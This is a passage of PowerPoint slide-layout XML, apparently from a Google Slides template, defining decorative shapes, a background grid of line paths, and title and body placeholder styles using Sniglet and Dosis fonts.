            <a:ext cx="210213" cy="458889"/>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5" name="Google Shape;495;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645010" y="355961"/>
            <a:ext cx="414157" cy="507762"/>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6" name="Google Shape;496;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8318810" y="-29822"/>
            <a:ext cx="456818" cy="425588"/>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7" name="Google Shape;497;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8" y="1013366"/>
            <a:ext cx="372518" cy="384998"/>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8" name="Google Shape;498;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8699356" y="179112"/>
            <a:ext cx="521292" cy="538992"/>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499" name="Google Shape;499;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700454" y="4557600"/>
            <a:ext cx="504670" cy="400627"/>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0" name="Google Shape;500;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258967" y="-86251"/>
            <a:ext cx="470320" cy="44221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1" name="Google Shape;501;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-35016" y="4075593"/>
            <a:ext cx="339602" cy="400617"/>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2" name="Google Shape;502;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="721258" y="4998019"/>
            <a:ext cx="463059" cy="177962"/>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3" name="Google Shape;503;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-243128" y="54210"/>
            <a:ext cx="589992" cy="414129"/>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4" name="Google Shape;504;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842052" y="-100873"/>
            <a:ext cx="388118" cy="408938"/>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5" name="Google Shape;505;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-38626" y="579046"/>
            <a:ext cx="297606" cy="211234"/>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6" name="Google Shape;506;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403775" y="11500"/>
            <a:ext cx="288245" cy="184202"/>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7" name="Google Shape;507;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955990" y="-57166"/>
            <a:ext cx="323616" cy="321546"/>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8" name="Google Shape;508;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333294" y="4678454"/>
            <a:ext cx="306966" cy="385027"/>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09" name="Google Shape;509;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91624" y="4552927"/>
            <a:ext cx="416228" cy="409988"/>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0" name="Google Shape;510;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1525678" y="4911343"/>
            <a:ext cx="391238" cy="28929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1" name="Google Shape;511;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704" y="4900231"/>
            <a:ext cx="180033" cy="373539"/>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2" name="Google Shape;512;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1920548">
            <a:off x="8225551" y="625274"/>
            <a:ext cx="501522" cy="425557"/>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3" name="Google Shape;513;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346867" y="4064142"/>
            <a:ext cx="479681" cy="339217"/>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4" name="Google Shape;514;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7996280" y="316930"/>
            <a:ext cx="279906" cy="357966"/>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5" name="Google Shape;515;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8801760" y="790271"/>
            <a:ext cx="377708" cy="426638"/>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6" name="Google Shape;516;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258963" y="4957957"/>
            <a:ext cx="386048" cy="258065"/>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7" name="Google Shape;517;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8699345" y="1151407"/>
            <a:ext cx="174842" cy="187322"/>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4C2F4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297650" y="4853299"/>
            <a:ext cx="548700" cy="290100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr"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bwMode="auto">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6" y="-23"/>
            <a:ext cx="9143797" cy="5143378"/>
            <a:chOff x="239950" y="872550"/>
            <a:chExt cx="7042900" cy="3961625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;7;p1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="872550"/>
              <a:ext cx="7042900" cy="3961625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>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239950" y="47617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239950" y="46901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239950" y="46177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239950" y="45462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39950" y="44737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239950" y="44022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239950" y="43297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239950" y="42582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239950" y="41858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239950" y="41142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239950" y="40418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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="39693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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="38978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239950" y="38254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239950" y="37538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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="36814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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="36099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239950" y="35374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239950" y="34659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239950" y="33934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239950" y="33219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239950" y="32495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239950" y="31770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a:off x="239950" y="31055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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="3033100"/>
              <a:ext cx="7042900" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="281716"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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="296155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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="28891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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="281757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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="27451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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="2673600"/>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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="26011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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="2529625"/>
              <a:ext cx="7042900" cy="25"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="281716" h="1" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281715" y="1"/>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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="24572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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="23847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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="23132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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="22407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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="21692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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="20968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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="20252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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="19528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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="18813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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="18088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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="17373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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="16648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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="15924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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="15209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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="14484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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="13769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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="13044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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="123295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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="11605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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="108897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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="1016525"/>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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="239950" y="945000"/>
              <a:ext cx="7042900" cy="25"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="281716" h="1" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="281715" y="0"/>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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="72103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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="71379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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="70645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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="69921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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="69196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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="68472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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="67747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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="67023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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="66289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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65565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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="64840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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="64116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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6339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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="62667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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="61933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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="61209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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60484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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="59760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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="59036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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58302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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="57577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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56853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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="56129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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="55404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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="54680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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="53946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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="53222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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52497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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="51773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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5104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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="50324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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="49590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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="48866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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="48141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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="47417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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="46692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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45968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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45234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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="44510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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="43785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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="43061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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="42336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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="41603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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40878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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40154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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="39429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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="38705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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="37980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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="37247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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="36522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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="35798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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="35073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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="34349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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="33624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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="32891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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="32166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p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="31442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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="30717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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="29993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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="292595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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="28535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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="27810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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="27086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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2636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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="25637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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24903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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="24179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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="23454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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="22730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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="22005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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21281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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205477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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1982325"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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="19098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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18374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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="17649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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16925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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16191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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15467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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14742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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1401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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13294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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12560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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11835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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11111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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10387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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9662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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8938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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="82042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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747975"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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6755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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6031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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5306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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="458200" y="872550"/>
              <a:ext cx="25" cy="3961625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1" h="158465" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1"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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="38485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
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312400" y="872550"/>
              <a:ext cx="25" cy="3961625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1" h="158465" fill="none" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="158464"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525" cap="rnd"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
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="225025"/>
            <a:ext cx="67917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1pPr>
            <a:lvl2pPr lvl="1">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2pPr>
            <a:lvl3pPr lvl="2">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3pPr>
            <a:lvl4pPr lvl="3">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4pPr>
            <a:lvl5pPr lvl="4">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5pPr>
            <a:lvl6pPr lvl="5">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6pPr>
            <a:lvl7pPr lvl="6">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7pPr>
            <a:lvl8pPr lvl="7">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8pPr>
            <a:lvl9pPr lvl="8">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3C78D8"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Sniglet"/>
              <a:buNone/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1314900"/>
            <a:ext cx="6791700" cy="3610800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-393700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-355600">
              <a:spcBef>
